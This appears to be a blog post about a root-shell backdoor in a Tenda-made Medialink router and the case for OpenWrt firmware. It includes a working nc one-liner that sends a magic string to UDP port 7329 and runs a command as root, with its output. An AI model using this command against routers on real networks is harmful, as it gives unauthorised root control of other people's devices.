Backdoor in my Medialink router

Just because you're paranoid doesn't mean they aren't out to getcha.

Here's another example of why we need free software running the Internet. When I bought my Medialink router it was the most popular brand of wireless router on Amazon.com. It is created by a Chinese corporation called Tenda.

And it comes with a root shell backdoor, which I just tested:

$ echo -ne "w302r_mfg\x00x/bin/ps" | nc -u -q 5 192.168.0.1 7329
  PID USER       VSZ STAT COMMAND
    1 0         1360 S    init
    2 0            0 SWN  [ksoftirqd/0]
    3 0            0 SW<  [events/0]
    4 0            0 SW<  [khelper]
    5 0            0 SW<  [kthread]
    6 0            0 SW<  [kblockd/0]
    7 0            0 SW<  [kswapd0]
    8 0            0 SW   [mtdblockd]
   16 0         2000 S    httpd
   18 0         1364 S    /bin/sh
   27 0            0 SW   [RtmpCmdQTask]
   28 0            0 SW   [RtmpWscTask]
   84 0         2328 S    wscd -m 1 -a 192.168.0.1 -i ra0
   85 0         2328 S    wscd -m 1 -a 192.168.0.1 -i ra0
  148 0         1200 S    netdog
  151 0         2000 S    httpd
  152 0         2000 S    httpd
  228 0         1360 S    udhcpc -i eth2.2 -s /etc/udhcpc.script -p /var/run/ud
  430 0         1316 S    dnrd -a 192.168.0.1 -R /etc/dnrd -s 10.0.0.138
  528 0         1076 S    /bin/sntp 7
  554 0         2352 S    upnpd -f eth2.2 br0
  555 0         2352 S    upnpd -f eth2.2 br0
  595 0         1368 S    udhcpd /etc/udhcpd.conf
  601 0         1160 S    netctl FilterDaemon
  614 0         1356 S    sh -c bin/ps
  615 0         1356 R    bin/ps

The backdoor was discovered by this hacker.

Don't get me wrong, it's not like I trusted this thing before. On the other hand there are many ways running your network on a device with a remote root shell bound to a UDP port can turn out badly. So I applied the firmware update provided by Tenda (ha you caught us!). I'm hoping in the new firmware they made the backdoor a little bit harder to find around (e.g., by adding a port knocking scheme).

I also went shopping for a new router without a built-in backdoor but it turns out they are all backdoored! The current most popular brand of router on Amazon.com is TP-LINK, another Chinese brand. They didn't even bother to patch their backdoor.

FWIW, it's not just the Chinese routers, even the US made ones. At this point I guess the best we can hope for from the manufacturers is put in more of an effort to hide their shenanigans. A root shell bound to a UDP port? Come on.

In the end I did end up buying a new router, a TP-Link WDR4300. Yes the default firmware comes with a backdoor, but they're very popular and are supported by the OpenWRT - Open Wireless Router free software project.

Once again, free software saves the day.

Comments

Liraz Siri's picture

Thanks for the reference. I hadn't heard of the open wireless project before. I'm reading up on it on the EFF website and it looks awesome. Which just goes to show how you don't know what you don't know.

It's a shame I won't be able to run the first versions of this on the new router I am expecting but I have a hunch if Open Wireless gets enough traction it will be available for the device I bought as well, if it isn't already compatible. Most of these routers use the same or very similar system-on-chip boards at the hardware level.

Or maybe alternatively the Open Wireless feature set gets merged back into OpenWrt, which is is distantly related to (Open Wireless is based on CeroWrt which is based on OpenWrt).

Pages

Add new comment